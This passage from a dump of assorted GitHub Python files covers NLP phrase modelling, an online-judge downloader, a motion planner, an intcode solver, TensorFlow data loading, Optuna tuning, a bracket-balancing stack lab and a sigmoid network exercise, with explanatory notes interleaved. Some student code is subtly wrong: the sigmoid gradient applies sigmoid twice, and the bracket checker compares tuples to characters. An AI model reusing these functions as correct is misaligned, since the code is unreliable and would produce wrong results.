tokens]\n\n\ndef build_phrase_model():\n\n phrase_list = load_phrases()\n\n phrases = Phrases(Corpus(CORPUS_FILE))\n bigrams = Phraser(phrases)\n\n bigrams.save(MODEL_FILE)\n\n years = Corpus(CORPUS_FILE).get_years()\n authors = Corpus(CORPUS_FILE).get_authors()\n\n with open(OUT_FILE, \"w\") as f:\n for i, line in tqdm(enumerate(bigrams[Corpus(CORPUS_FILE)])):\n\n line = remove_under(line)\n line = check_phrase_list(phrase_list, line)\n\n line = [ authors[i] ] + line\n line = [ years[i] ] + line\n\n f.write(\"{}\\n\".format(\" \".join(remove_under(line))))\n\n\nif __name__ == \"__main__\":\n build_phrase_model()\n \n #phrase_list = load_phrases()\n #print(check_phrase_list(phrase_list, [\"a\", \"b\", \"想ひ\", \"出づる\", \"c\"]))\n 
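The quandl record above builds its regression target with `df[forecast_col].shift(-forecast_out)` followed by `dropna()`. A tiny worked example of that shift-and-drop step on synthetic data (the 0.4 fraction is chosen only so the effect is visible on five rows):

```python
# Shifting the close column up by forecast_out rows pairs today's features
# with the price forecast_out days ahead; dropna() trims the tail rows
# that no longer have a future value.
import math
import pandas as pd

df = pd.DataFrame({"Adj. Close": [10.0, 11.0, 12.0, 13.0, 14.0]})
forecast_out = int(math.ceil(0.4 * len(df)))      # 2 rows ahead here
df["label"] = df["Adj. Close"].shift(-forecast_out)
df.dropna(inplace=True)
print(df)   # rows 0-2 remain, each labeled with the close 2 days later
```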
\n","repo_name":"missinglinks/japanologentag2018","sub_path":"src/corpus_1_phrase_model.py","file_name":"corpus_1_phrase_model.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26722598166","text":"from typing import List\nfrom lexer.token import Token\nfrom lexer.code_handler import CodeHandler\nfrom lexer.lexer import Lexer, LexicalError\nfrom parser.parser import Parser, SyntacticalError\nimport asyncio\n\n\nasync def main():\n handler = CodeHandler()\n lexer = Lexer()\n source_code = await handler.read_code_file(\"program.xqdl\")\n tokens: List[Token] = []\n\n try:\n tokens = lexer.tokenize(source_code)\n except LexicalError as e:\n print(e)\n return\n\n parser = Parser(tokens)\n try:\n parser.parse()\n except SyntacticalError as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"codeYann/syntax-parsing","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35728973622","text":"# Python Version: 3.x\nimport json\nimport os\nimport pathlib\nfrom typing import *\n\nimport onlinejudge_command.download_history\nimport onlinejudge_command.format_utils as format_utils\nimport onlinejudge_command.logging as log\nimport onlinejudge_command.utils as utils\nimport requests.exceptions\n\nimport onlinejudge.dispatch as dispatch\nfrom onlinejudge.service.yukicoder import YukicoderProblem\nfrom onlinejudge.type import SampleParseError, TestCase\n\nif TYPE_CHECKING:\n import argparse\n\n\ndef convert_sample_to_dict(sample: TestCase) -> Dict[str, str]:\n data = {} # type: Dict[str, str]\n data[\"name\"] = sample.name\n data[\"input\"] = sample.input_data.decode()\n if sample.output_data is not None:\n data[\"output\"] = sample.output_data.decode()\n return data\n\n\ndef download(args: 'argparse.Namespace') -> None:\n # prepare values\n problem = dispatch.problem_from_url(args.url)\n if problem is None:\n raise requests.exceptions.InvalidURL('The contest \"%s\" is not supported' % args.url)\n is_default_format = args.format is None and args.directory is None # must be here since args.directory and args.format are overwritten\n if args.directory is None:\n args.directory = pathlib.Path('test')\n if args.format is None:\n args.format = '%b.%e'\n\n # get samples from the server\n with utils.new_session_with_our_user_agent(path=args.cookie) as sess:\n if args.yukicoder_token and isinstance(problem, YukicoderProblem):\n sess.headers['Authorization'] = 'Bearer {}'.format(args.yukicoder_token)\n if args.system:\n samples = problem.download_system_cases(session=sess)\n else:\n samples = problem.download_sample_cases(session=sess)\n\n if not samples:\n raise SampleParseError(\"Sample not found\")\n\n # append the history for submit subcommand\n if not args.dry_run and is_default_format:\n history = onlinejudge_command.download_history.DownloadHistory()\n if not list(args.directory.glob('*')):\n # reset the history to help users who use only one directory for many problems\n history.remove(directory=pathlib.Path.cwd())\n history.add(problem, directory=pathlib.Path.cwd())\n\n # prepare files to write\n def iterate_files_to_write(sample: TestCase, *, i: int) -> Iterator[Tuple[str, pathlib.Path, bytes]]:\n for ext in ['in', 'out']:\n data = getattr(sample, ext + 'put_data')\n if data is None:\n continue\n name = sample.name\n table = 
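The phrase-model record above trains `Phrases` on the corpus and freezes it into a `Phraser` for fast lookup. A self-contained toy run of the same two-step API; the low `min_count` and `threshold` are only there so three sentences suffice to form a bigram, and the exact merges depend on the gensim version:

```python
from gensim.models.phrases import Phrases, Phraser

sentences = [["new", "york", "is", "big"],
             ["i", "love", "new", "york"],
             ["new", "york", "winters"]]
bigram = Phraser(Phrases(sentences, min_count=1, threshold=0.1))
print(bigram[["i", "love", "new", "york"]])  # e.g. ['i', 'love', 'new_york']
```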
{}\n table['i'] = str(i + 1)\n table['e'] = ext\n table['n'] = name\n table['b'] = os.path.basename(name)\n table['d'] = os.path.dirname(name)\n path = args.directory / format_utils.percentformat(args.format, table) # type: pathlib.Path\n yield ext, path, data\n\n for i, sample in enumerate(samples):\n for _, path, _ in iterate_files_to_write(sample, i=i):\n if path.exists():\n raise FileExistsError('Failed to download since file already exists: ' + str(path))\n\n # write samples to files\n for i, sample in enumerate(samples):\n log.emit('')\n log.info('sample %d', i)\n for ext, path, data in iterate_files_to_write(sample, i=i):\n log.status('%sput: %s', ext, sample.name)\n if not args.silent:\n log.emit(utils.make_pretty_large_file_content(data, limit=40, head=20, tail=10, bold=True))\n if not args.dry_run:\n path.parent.mkdir(parents=True, exist_ok=True)\n with path.open('wb') as fh:\n fh.write(data)\n log.success('saved to: %s', path)\n\n # print json\n if args.json:\n print(json.dumps(list(map(convert_sample_to_dict, samples))))\n","repo_name":"rodrigoieh/oj","sub_path":"onlinejudge_command/subcommand/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"36561028378","text":"# coding: utf-8\r\ndef delblankline(infile, outfile):\r\n infopen = open(infile, 'r',encoding=\"utf-8\")\r\n outfopen = open(outfile, 'w',encoding=\"utf-8\")\r\n db = infopen.read()\r\n outfopen.write(db.replace(' ','\\n'))\r\n infopen.close()\r\n outfopen.close()\r\n\r\ndelblankline(\"C:\\\\Users\\\\hp\\\\Desktop\\\\1\\\\111.txt\", \"C:\\\\Users\\\\hp\\\\Desktop\\\\1\\\\333.txt\")\r\n\r\n","repo_name":"chuyu-sama/web","sub_path":"space-to-endl.py","file_name":"space-to-endl.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25616755306","text":"import numpy as np\nfrom p3iv_modules.interfaces.planning import PlannerInterface\nfrom p3iv_types.motion import MotionPlan, MotionPlans\nfrom p3iv_utils.coordinate_transformation import CoordinateTransform\nfrom p3iv_utils.vehicle_models import get_control_inputs\n\n\nclass Planner(PlannerInterface):\n def __init__(self, ego_id, ego_width, ego_length, configurations, *args, **kwargs):\n super(Planner, self).__init__(ego_id, ego_width, ego_length, configurations, *args, **kwargs)\n self._id = ego_id\n self._width = ego_width\n self._length = ego_length\n self.dt = configurations[\"temporal\"][\"dt\"] / 1000.0\n self.n = configurations[\"temporal\"][\"N\"]\n self.timestamp = 0\n\n # store intermediate stuff for convenience\n self._coordinate_transform = None\n self._state = None\n self._progress = None\n\n def __call__(self, timestamp, state, scene_model, situation_model, decision_base, *args, **kwargs):\n PlannerInterface.type_check(timestamp, state, scene_model, situation_model, decision_base, *args, **kwargs)\n self.setCurrentTimestamp(timestamp)\n self.setDrivingCorridor(decision_base.corridor)\n\n foo = 0.0\n self.setMotionState(state, foo)\n mp = self.solve()\n\n mps = MotionPlans()\n mps.append(mp)\n return mps\n\n def setCurrentTimestamp(self, timestamp):\n assert isinstance(timestamp, int)\n self.timestamp = timestamp\n\n def setDrivingCorridor(self, corridor):\n self._corridor_centerline = corridor.center\n self._coordinate_transform = CoordinateTransform(self._corridor_centerline)\n\n def setMotionState(self, state, progress):\n 
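Despite its name, `delblankline` in the record above replaces every space with a newline rather than deleting blank lines. A version that does what the name says might look like this (the hard-coded desktop paths in the original call are machine-specific, so they stay as parameters here):

```python
def remove_blank_lines(infile, outfile):
    with open(infile, encoding="utf-8") as src, \
         open(outfile, "w", encoding="utf-8") as dst:
        for line in src:
            if line.strip():          # keep only non-empty lines
                dst.write(line)
```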
self._state = state\n self._progress = progress\n\n def solve(self, *args, **kwargs):\n current_pos = self._progress\n profile = np.array([])\n for i in range(self.n):\n new_pos = current_pos + self._state.speed * self.dt\n profile = np.append(profile, new_pos)\n current_pos = new_pos\n frenet_l = np.append(self._progress, profile)\n\n xy = self._coordinate_transform.expand(self._state.position.mean, frenet_l, ignore_lateral_offset=True)\n mp = MotionPlan()\n mp.states(xy, dt=self.dt)\n\n mp.controls.acceleration = np.zeros(self.n + 1)\n wheelbase = 0.7 * self._length\n mp.controls.steering = get_control_inputs(mp.states.yaw.mean, mp.states.speed, wheelbase, self.dt)[:, 0]\n\n PlannerInterface.overwrite_with_current_state(mp, self._state)\n\n assert len(mp.states) == self.n + 1 # 1-> current state\n return mp\n","repo_name":"fzi-forschungszentrum-informatik/P3IV","sub_path":"p3iv_modules/src/p3iv_modules/planner/constant_velocity.py","file_name":"constant_velocity.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"6590565446","text":"lines = [l.strip() for l in open('input') if l]\nvalues = [int(value) for value in lines[0].split(',')]\n\n\ndef compute(input_values):\n input = list(values)\n index = 0\n relative_mode_index = 0\n\n while True:\n command_def = input[index]\n command = command_def % 100\n\n def get_address(offset):\n mode = (command_def // (10 * 10**offset)) % 10\n\n if mode == 0:\n return input[index + offset]\n elif mode == 1:\n return index + offset\n elif mode == 2:\n return input[index + offset] + relative_mode_index\n\n assert False == mode\n\n def get(offset):\n address = get_address(offset)\n\n if address < 0:\n raise IndexError()\n return input[address % len(input)]\n\n def set(offset, value):\n address = get_address(offset)\n if address < 0:\n raise IndexError()\n if address >= len(input):\n input.extend([0] * (address - len(input) + 1))\n\n input[address] = value\n\n\n if command == 1:\n a = get(1)\n b = get(2)\n set(3, a + b)\n index += 4\n elif command == 2:\n a = get(1)\n b = get(2)\n\n set(3, a * b)\n index += 4\n elif command == 3:\n set(1, input_values.pop(0))\n index += 2\n elif command == 4:\n next_input = yield get(1)\n if next_input is not None:\n input_values.append(next_input)\n index += 2\n elif command == 5:\n a = get(1)\n b = get(2)\n\n if a != 0:\n index = b\n else:\n index += 3\n elif command == 6:\n a = get(1)\n b = get(2)\n\n if a == 0:\n index = b\n else:\n index += 3\n elif command == 7:\n a = get(1)\n b = get(2)\n set(3, 1 if a < b else 0)\n index += 4\n elif command == 8:\n a = get(1)\n b = get(2)\n set(3, 1 if a == b else 0)\n index += 4\n elif command == 9:\n a = get(1)\n relative_mode_index += a\n index += 2\n elif command == 99:\n return\n\n\ndef paint(initial_colour):\n x = y = 0\n direction_x = 0\n direction_y = 1\n\n colours = {}\n\n r = compute([initial_colour])\n new_colour = next(r)\n\n try:\n while(True):\n turn = next(r)\n\n colours[(x ,y)] = new_colour\n\n direction_x, direction_y = direction_y, direction_x\n if turn == 0 and direction_x:\n direction_x *= -1\n elif turn ==1 and direction_y:\n direction_y *= -1\n\n x += direction_x\n y += direction_y\n\n colour = colours.get((x, y), initial_colour)\n new_colour = r.send(colour)\n except StopIteration:\n pass\n\n return colours\n\n\ndef part1():\n return paint(0)\n\ndef part2():\n colours = paint(1)\n\n min_x = min([c[0] for c in colours])\n max_x = max([c[0] for c in 
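`Planner.solve` in the constant-velocity record integrates arc length one step at a time in a Python loop. The same n+1-point longitudinal profile (current position plus the horizon) can be produced in one vectorized expression:

```python
import numpy as np

def rollout(s0, speed, dt, n):
    """Arc-length positions s0 + k*speed*dt for k = 0..n (current + n steps)."""
    return s0 + speed * dt * np.arange(n + 1)

print(rollout(0.0, 10.0, 0.1, 5))   # [0. 1. 2. 3. 4. 5.]
```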
colours])\n min_y = min([c[1] for c in colours])\n max_y = max([c[1] for c in colours])\n\n for y in range(max_y, min_y - 1, -1):\n line = ''\n for x in range(min_x, max_x + 1):\n colour = colours.get((x,y), 0)\n line += ' ' if not colour else '#'\n print(line)\n\nprint('Part 1: ')\nprint(len(part1()))\nprint('Part 2: ')\npart2()\n","repo_name":"victorkirov/aoc","sub_path":"2019/11/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37687713194","text":"import numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nimport random\nfrom scipy import ndimage\n\n@tf.function\ndef rotate(volume):\n \"\"\"Rotate the volume by a few degrees\"\"\"\n\n def scipy_rotate(volume):\n # define some rotation angles\n angles = [-20, -10, -5, 5, 10, 20]\n # pick angles at random\n angle = random.choice(angles)\n # rotate volume\n volume = ndimage.rotate(volume, angle, reshape=False)\n volume[volume < 0] = 0\n volume[volume > 1] = 1\n return volume\n\n augmented_volume = tf.numpy_function(scipy_rotate, [volume], tf.float32)\n return augmented_volume\n\n\ndef train_preprocessing(volume, label):\n \"\"\"Process training data by rotating and adding a channel.\"\"\"\n # Rotate volume\n volume = rotate(volume)\n volume = tf.expand_dims(volume, axis=3)\n return volume, label\n\n\ndef validation_preprocessing(volume, label):\n \"\"\"Process validation data by only adding a channel.\"\"\"\n volume = tf.expand_dims(volume, axis=3)\n return volume, label\n\ndef get_data():\n input_data_list = np.load('data_list.npy', allow_pickle=True)\n label_data = np.load('label_list.npy', allow_pickle=True)\n print(input_data_list.shape)\n\n x_train, x_val, y_train, y_val = train_test_split(input_data_list, label_data, test_size=0.2, random_state=42)\n a = np.concatenate((x_train, x_val), axis=0)\n b = np.concatenate((y_train, y_val), axis=0)\n\n train_loader = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n validation_loader = tf.data.Dataset.from_tensor_slices((x_val, y_val))\n \n # print(validation_loader.shape)\n \n batch_size = 2\n # Augment the on the fly during training.\n train_dataset = (\n train_loader.shuffle(len(x_train))\n .map(train_preprocessing)\n .batch(batch_size)\n .prefetch(2)\n )\n\n print(train_dataset)\n\n # Only rescale.\n validation_dataset = (\n validation_loader.shuffle(len(x_val))\n .map(validation_preprocessing)\n .batch(batch_size)\n .prefetch(2)\n )\n print(\"데이터 완료\")\n\n # data = train_dataset.take(1)\n # images, labels = list(data)[0]\n # images = images.numpy()\n # image = images[0]\n # print(\"Dimension of the CT scan is:\", image.shape)\n \n return train_dataset, validation_dataset\n","repo_name":"ggaebi99/Medical_AI","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14710104486","text":"from __future__ import annotations\n\nfrom gi.repository import GtkSource\n\nfrom skytemple_ssb_debugger.context.abstract import AbstractDebuggerControlContext\n\n\nclass StringEventEmitter:\n \"\"\"Emits the string changed event to the context when a string was selected or changed.\"\"\"\n def __init__(self, view: GtkSource.View, context: AbstractDebuggerControlContext):\n self.view = view\n self.buffer: GtkSource.Buffer = view.get_buffer()\n 
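A toy-scale version of the `tf.data` pipeline in the Medical_AI record above, with random arrays standing in for the `.npy` CT volumes (the shapes are illustrative only):

```python
import numpy as np
import tensorflow as tf

x = np.random.rand(8, 32, 32, 16).astype("float32")   # 8 fake volumes
y = np.random.randint(0, 2, size=(8,))
ds = (
    tf.data.Dataset.from_tensor_slices((x, y))
    .shuffle(8)
    .map(lambda v, l: (tf.expand_dims(v, axis=3), l))  # add channel dim
    .batch(2)
    .prefetch(2)
)
for volumes, labels in ds.take(1):
    print(volumes.shape)   # (2, 32, 32, 16, 1)
```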
self.buffer.connect('notify::cursor-position', self.on_buffer_notify_cursor_position)\n self.buffer.connect('changed', self.on_buffer_notify_cursor_position)\n self.context = context\n\n def on_buffer_notify_cursor_position(self, buffer: GtkSource.Buffer, *args):\n textiter = buffer.get_iter_at_offset(buffer.props.cursor_position)\n if 'string' in buffer.get_context_classes_at_iter(textiter):\n # iter_backward_to_context_class_toggle and iter_forward_to_context_class_toggle\n # seem to be broken (because of course they are), so we do it manually.\n start = self._get_string_start(textiter)\n end = self._get_string_end(textiter)\n if start is None or end is None:\n return True\n string = buffer.get_text(start, end, False)\n self.context.on_selected_string_changed(string)\n return True\n\n @staticmethod\n def _get_string_start(textiter):\n # First make sure we aren't at the start of the string...\n pit = textiter.copy()\n pit_char = pit.get_char()\n pit.forward_char()\n pit_next_char = pit.get_char()\n if pit_char in [\"'\", '\"'] and pit_next_char == pit_char:\n return\n it = textiter.copy()\n it.backward_char()\n prev = it.copy()\n prev.backward_char()\n while it.get_char() not in [\"'\", '\"'] or prev.get_char() == '\\\\':\n if not it.backward_char():\n return\n prev = it.copy()\n prev.backward_char()\n it.forward_char()\n return it\n\n @staticmethod\n def _get_string_end(textiter):\n it = textiter.copy()\n prev_char = it.get_char()\n while it.get_char() not in [\"'\", '\"'] or prev_char == '\\\\':\n prev_char = it.get_char()\n if not it.forward_char():\n return\n return it\n","repo_name":"SkyTemple/skytemple-ssb-debugger","sub_path":"skytemple_ssb_debugger/model/completion/calltips/string_event_emitter.py","file_name":"string_event_emitter.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"4391049217","text":"import optuna\nimport model_pipeline\nfrom model_pipeline import FARMTrainer, ModelConfig, FileConfig, TokenizerConfig, MLFlowConfig, ProcessorConfig, TrainingConfig\n\ndef objective(trial):\n # Uniform parameter\n dropout_rate = trial.suggest_uniform('dropout_rate', 0.0, 1.0)\n\n num_epochs = trial.suggest_int('num_epochs', 1, 5, 1)\n batch_size = trial.suggest_int('batch_size', 4, 32, 4)\n\n # Loguniform parameter\n learning_rate = trial.suggest_loguniform('learning_rate', 1e-5, 1e-2)\n\n file_config = FileConfig()\n train_config = TrainingConfig()\n\n train_config.learning_rate = learning_rate\n train_config.n_epochs = num_epochs\n train_config.dropout = dropout_rate\n train_config.batch_size = batch_size\n train_config.run_hyp_tuning = True\n\n model_config = ModelConfig()\n mlflow_config = MLFlowConfig()\n processor_config = ProcessorConfig()\n tokenizer_config = TokenizerConfig()\n\n farm_trainer = FARMTrainer(\n file_config =file_config,\n tokenizer_config=tokenizer_config,\n model_config=model_config,\n processor_config=processor_config,\n training_config=train_config,\n mlflow_config=mlflow_config\n )\n acc = farm_trainer.run(trial)\n\n return acc\n\nif __name__ == \"__main__\":\n study = optuna.create_study(direction=\"maximize\", pruner=optuna.pruners.MedianPruner())\n study.optimize(objective, n_trials=100)\n\n pruned_trials = [t for t in study.trials if t.state == optuna.structs.TrialState.PRUNED]\n complete_trials = [t for t in study.trials if t.state == optuna.structs.TrialState.COMPLETE]\n\n print(\"Study statistics: \")\n print(\" Number of finished trials: \", 
len(study.trials))\n print(\" Number of pruned trials: \", len(pruned_trials))\n print(\" Number of complete trials: \", len(complete_trials))\n\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(\" Value: \", trial.value)\n\n print(\" Params: \")\n for key, value in trial.params.items():\n print(\" {}: {}\".format(key, value))\n","repo_name":"os-climate/corporate_data_extraction","sub_path":"data_extractor/code/model_pipeline/model_pipeline/optuna_hyp.py","file_name":"optuna_hyp.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74305257068","text":"# CSE220 LAB_05\n# 21141064\n# Basit Hussain\n# Sec: 13\n\n\n\nclass ArrayStack:\n def __init__(self, sz):\n self.bracketsTracker_stack = [None] * sz\n self.indexTracker_stack = [None] * sz\n self.size1 = 0\n self.size2 = 0\n def push(self, e):\n if self.size1 == len(self.bracketsTracker_stack):\n print(\"No space in array\")\n else:\n if str(e) in \"({[\":\n self.bracketsTracker_stack[self.size1] = e\n self.size1 += 1\n else:\n self.indexTracker_stack[self.size2] = e\n self.size2 += 1\n def pop(self):\n if self.size1 == 0:\n return (\"Array is empty\")\n else:\n temp1 = self.bracketsTracker_stack[self.size1-1]\n self.bracketsTracker_stack[self.size1-1] = 0\n temp2 = self.indexTracker_stack[self.size2-1]\n self.indexTracker_stack[self.size2-1] = 0\n self.size1 -= 1\n self.size2 -= 1\n return temp1, temp2\n def peek(self):\n if self.size1 == 0:\n return (\"Array is empty\")\n else:\n temp = self.bracketsTracker_stack[self.size-1]\n return temp\n def is_empty(self):\n return self.size1 == 0\n \n def balancing(self, string):\n check = True\n for i in range(len(string)):\n if string[i] in \"({[\":\n self.push(string[i])\n self.push(i)\n else:\n if string[i] in \")}]\":\n if self.is_empty() == True:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(i+1) + \". \" + str(string[i]) + \"- not opened.\"\n output = \"{} {}\". format(check, error)\n return output\n top = self.pop()\n if top == \"(\":\n if string[i] != \")\":\n check = False\n if top == \"{\":\n if string[i] != \"}\":\n check = False\n if top == \"[\":\n if string[i] != \"]\":\n check = False\n if self.is_empty() == True and check == True:\n return \"This expression is correct.\"\n else:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(top[0]) + \". \" + str(top[1]+1) + \"- not closed.\" \n output = \"{} {}\". 
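The study in the optuna record above attaches a `MedianPruner`, which only has an effect if the objective reports intermediate scores through the `trial` handle that `farm_trainer.run(trial)` receives. A minimal objective showing that report/prune protocol, with a stand-in for the training loop (`suggest_float(..., log=True)` is the current spelling of the record's `suggest_loguniform`):

```python
import optuna

def objective(trial):
    lr = trial.suggest_float("learning_rate", 1e-5, 1e-2, log=True)
    acc = 0.0
    for epoch in range(5):
        acc += lr * 10            # stand-in for one epoch of training
        trial.report(acc, epoch)  # expose the intermediate value
        if trial.should_prune():
            raise optuna.TrialPruned()
    return acc

study = optuna.create_study(direction="maximize",
                            pruner=optuna.pruners.MedianPruner())
study.optimize(objective, n_trials=10)
```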
format(check, error)\n return output\n \n \n \nprint(\"==========Test 1==========\")\nstring = \"1+2*(3/4)\"\ns1 = ArrayStack(len(string))\nprint(s1.balancing(string))\n\n\n\n\nclass Node:\n def __init__(self, e):\n self.e = e\n self.next = None\n\nclass LinklistStack:\n def __init__(self):\n self.head1 = None\n self.size1 = 0\n self.head2 = None\n self.size2 = 0\n def push(self, val):\n if self.head1 == None:\n if str(val) in \"({[\":\n self.head1 = Node(val)\n self.size1 += 1\n else:\n self.head2 = Node(val)\n self.size2 += 1 \n else:\n if str(val) in \"({[\":\n n1 = Node(val)\n n1.next = self.head1\n self.head1 = n1\n self.size1 += 1\n else:\n n2 = Node(val)\n n2.next = self.head2\n self.head2 = n2\n self.size2 += 1\n def pop(self):\n if self.head1 == None:\n return (\"LinkList is empty\")\n else:\n h1 = self.head1\n t1 = h1.e\n self.head1 = h1.next\n h1 = None\n self.size1 -= 1\n \n h2 = self.head2\n t2 = h2.e\n self.head2 = h2.next\n h2 = None\n self.size2 -= 1\n return t1, t2\n def peek(self):\n if self.head1 == None:\n return (\"LinkList is empty\")\n else:\n return self.head1.e\n def is_empty(self):\n return self.size1 == 0\n \n def balancing(self, string):\n check = True\n for i in range(len(string)):\n if string[i] in \"({[\":\n self.push(string[i])\n self.push(i)\n else:\n if string[i] in \")}]\":\n if self.is_empty() == True:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(i+1) + \". \" + str(string[i]) + \"- not opened.\"\n output = \"{} {}\". format(check, error)\n return output\n top = self.pop()\n if top == \"(\":\n if string[i] != \")\":\n check = False\n if top == \"{\":\n if string[i] != \"}\":\n check = False\n if top == \"[\":\n if string[i] != \"]\":\n check = False\n if self.is_empty() == True and check == True:\n return \"This expression is correct.\"\n else:\n check = \"This expression is NOT correct.\"\n error = \"\\nError at character # \" + str(top[1]+1) + \". \" + str(top[0]) + \"- not closed.\" \n output = \"{} {}\". 
format(check, error)\n return output\n \nprint(\"==========Test 1==========\") \nl = LinklistStack()\nstring = \"1+2*[3*3+{4–5(6(7/8/9)+10)}–11+(12*8)/{13+13}]+14\"\nprint(l.balancing(string))\n","repo_name":"BasitHussain5/BRACU_All_CSE","sub_path":"CSE220/LAB/LAB05/Lab05_21141064.py","file_name":"Lab05_21141064.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29179167940","text":"import torch\nfrom torch.nn.functional import relu\nimport torch.nn as nn\n\n\nclass Attention(nn.Module):\n\n def __init__(self, seq_len, embed_dim, n_heads, hidden_dim, n_classes, p_drop=0):\n super(Attention, self).__init__()\n self.att = nn.MultiheadAttention(embed_dim, n_heads, p_drop)\n self.fc1 = nn.Linear(seq_len * embed_dim, hidden_dim)\n self.fc2 = nn.Linear(hidden_dim, n_classes)\n self.drop1 = nn.Dropout(p_drop)\n self.drop2 = nn.Dropout(p_drop)\n self.norm1 = nn.LayerNorm(embed_dim)\n self.norm2 = nn.LayerNorm(hidden_dim)\n\n def forward(self, x):\n # shape (L, N, embed_dim) for attention layer\n x = x.permute(2, 0, 1)\n ao, _ = self.att(x, x, x)\n ao = self.drop1(ao)\n x = self.norm1(ao + x)\n # shape (N, -1) for fc layers\n x = x.permute(1, 0, 2)\n x = x.reshape(x.shape[0], -1)\n x = self.fc1(x)\n x = relu(self.norm2(x))\n x = self.fc2(x)\n return x","repo_name":"lucasmllr/classify_language","sub_path":"src/models/att.py","file_name":"att.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6160138642","text":"import numpy as np\nfrom collections import defaultdict\nimport csv\n\ndef main():\n\n\tfor dir in ['fr-en', 'en', 'en-fr', 'fr']:\n\n\t\tdatafile = np.load('{}_sentiment.npy'.format(dir), allow_pickle=True).flat[0]\n\t\tdatalist = datafile.keys()\n\n\t\twith open('./subs/new_moviesents_{}.csv'.format(dir), 'w+') as f:\n\t\t\twriter = csv.writer(f, delimiter='|')\n\t\t\tfor value in datalist:\n\t\t\t\twriter.writerow([str(value), ',', datafile[value]])\n\t\tf.close()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"vdorbala/Movie-Subtitle-Quality","sub_path":"npy2csv.py","file_name":"npy2csv.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"514097477","text":"#################################################################################\n# #\n# Code for Question 2(b) #\n# #\n#################################################################################\n\nimport numpy as np\n\n\ndef sigmoid(Z):\n \"\"\"\n sigmoid(ndarray) -> ndarray\n \n Applies sigmoid to each entry of the matrix Z\n \n Z: (num_rows, num_cols) input matrix\n \n Returns: Z_hat\n Z_hat: (num_rows, num_cols) Matrix obtained by applying sigmoid to\n each entry of Z \n \"\"\"\n # Initialize the output\n Z_hat = np.zeros(Z.shape)\n \n ########################### YOUR CODE HERE ################################\n \n # Copy your implementation from Ans 2(a) here\n \n # raise NotImplementedError\n Z_hat = 1/(1+np.exp(-Z))\n ###########################################################################\n \n return Z_hat\n \n \n \ndef sigmoid_grad(Z):\n \"\"\"\n sigmoid_grad(ndarray) -> ndarray\n \n Let Z = sigmoid(X), be matrix obtained by applying sigmoid to another\n matrix X. 
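In the Lab05 record above, `pop()` returns a `(bracket, index)` tuple, yet `balancing` compares `top` directly against `"("`, so the mismatch branches appear unreachable. For contrast, a compact single-stack checker that tracks the same (bracket, position) information:

```python
def balanced(expr):
    pairs = {")": "(", "}": "{", "]": "["}
    stack = []                       # holds (bracket, position)
    for i, ch in enumerate(expr):
        if ch in "({[":
            stack.append((ch, i))
        elif ch in ")}]":
            if not stack or stack[-1][0] != pairs[ch]:
                return False, i      # unmatched closer at position i
            stack.pop()
    if stack:
        return False, stack[-1][1]   # unclosed opener
    return True, None

print(balanced("1+2*(3/4)"))         # (True, None)
print(balanced("1+2*(3/4"))          # (False, 4)
```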
This function computes sigmoid'(X).\n \n Z: (num_rows, num_cols) Sigmoid output\n \n Returns:\n Z_grad: (num_rows, num_cols) Computed gradient\n \"\"\"\n # Initialize the output\n Z_grad = np.zeros(Z.shape)\n \n ########################### YOUR CODE HERE ################################\n \n # Copy your implementation from Ans 2(a) here\n \n # raise NotImplementedError\n Z_grad = sigmoid(Z)*(1-sigmoid(Z))\n ###########################################################################\n \n return Z_grad \n \n\n\nclass Linear:\n \"\"\"\n Class that implements a single linear layer\n \"\"\"\n \n def __init__(self, num_inputs, num_outputs, act=sigmoid, \\\n act_grad=sigmoid_grad):\n \"\"\"\n __init__(self, int, int, function, function) -> None\n \n num_inputs: Number of features in the input (excluding bias)\n num_outputs: Number of output neurons (excluding bias)\n act: Activation function to use\n act_grad: Function that computes gradient of the activation function\n \"\"\" \n # Initialze variables that will be used later\n self.num_inputs = num_inputs\n self.num_outputs = num_outputs\n self.act = act\n self.act_grad = act_grad\n \n ########################### YOUR CODE HERE #############################\n \n # Copy your implementation from Ans 2(a) here \n\n # raise NotImplementedError\n self.W = np.random.rand(self.num_inputs,self.num_outputs)\n self.b = np.random.rand(1,self.num_outputs)\n ########################################################################\n \n \n def forward(self, X):\n \"\"\"\n forward(Linear, ndarray) -> ndarray\n \n Computes the forward pass on this layer\n \n X: (num_examples, num_inputs) Input matrix for this layer. Each row\n 